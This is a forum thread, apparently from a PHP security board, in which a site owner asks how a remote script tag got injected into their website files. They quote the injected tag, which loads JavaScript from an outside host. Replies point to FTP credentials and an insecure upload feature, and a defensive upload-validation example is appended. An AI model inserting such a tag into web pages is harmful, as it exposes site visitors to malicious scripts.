script tag inserted

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

Post by junjustkim »

Hi to all,

I am using the CodeIgniter framework for my website, which is hosted on a shared hosting server. In most of my index.php, home.php, index.html and other .js files, a script like the one below was inserted at the end of the file, using a different value in src="" each time. Is this cross-site scripting? How do they inject it into my files? I used 755 as the file permission. How can I prevent this? I've encountered it twice. Even when I replace all the files, it gets attacked again. Additionally, not only one domain is being attacked; almost all domains hosted on that server are.


<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
timWebUK
Forum Contributor
Posts: 239
Joined: Thu Oct 29, 2009 6:48 am
Location: UK

Re: script tag inserted

Post by timWebUK »

Change your FTP password to something more secure - more than 8 characters, upper case, lower case, integers and symbols.
junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

Re: script tag inserted

Post by junjustkim »

Hi timWebUK,

Thanks for your immediate reply. I already changed my FTP password, but the hacker still attacked my site. To all the experts: please give me advice or any suggestion to protect my site. I don't know what to do. I already reported it to the technical support of my hosting, but they said that there is something wrong with my code.

Please help me


Thanks
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: script tag inserted

Post by kaisellgren »

Use SSH when transferring files to the server.

You might have a vulnerability in your application. It's hard to guess. Are you doing any sort of file uploading on your site?
junjustkim
Forum Commoner
Posts: 44
Joined: Thu May 22, 2008 8:48 pm

Re: script tag inserted

Post by junjustkim »

Hi kaisellgren,

First, thank you for your help and suggestion. Does anyone know how the hacker could have inserted this script? Any thoughts about this?

I have file uploading on my site.


Thanks
Tirso
timWebUK
Forum Contributor
Posts: 239
Joined: Thu Oct 29, 2009 6:48 am
Location: UK

Re: script tag inserted

Post by timWebUK »

junjustkim wrote: I have file uploading on my site.
Chances are your file upload is insecure and they are exploiting it. If you post your code, we may be able to assist.
Ragnis
Forum Commoner
Posts: 31
Joined: Thu Nov 13, 2008 12:35 pm
Location: Saaremaa, Estonia, Europe, Asia, Planet Earth, The Solar System, Milky way.

Re: script tag inserted

Post by Ragnis »

Very likely the hacker just uploaded a PHP file and then executed it by going to yourdomain.com/files/hackerfile.php.

To prevent further attacks you should add some kind of file extension check to your upload.
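
One way to implement the file extension check suggested above, as an added example that is not part of the original thread or code posted by any participant. It goes a step further than the extension alone by also checking the file content and discarding the client's file name; the names `store_upload` and `ALLOWED_TYPES`, and the assumption that only images are uploaded, are hypothetical.

```php
<?php
declare(strict_types=1);

// Allowlist (assumed image-only site): extension => MIME type the content must have.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one entry of $_FILES and move it into $destDir.
 * Returns the stored file name; throws RuntimeException on rejection.
 */
function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('Upload failed or was not an HTTP upload');
    }

    // Extension check on the client-supplied name (last extension only).
    $ext = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('File extension not allowed');
    }

    // Content check: the sniffed MIME type must match the extension,
    // so a plain PHP script renamed to .jpg is rejected as well.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('File content does not match extension');
    }

    // Never reuse the client's file name: generate one and keep only the
    // validated extension, so a name like "x.php.jpg" cannot survive.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not store upload');
    }
    return $name;
}

// Usage (hypothetical form field and path):
// $stored = store_upload($_FILES['userfile'], '/home/example/uploads');
```

The destination directory should sit outside the web root, or have PHP execution disabled for it, so that a file that slips past the checks is still never run by the server.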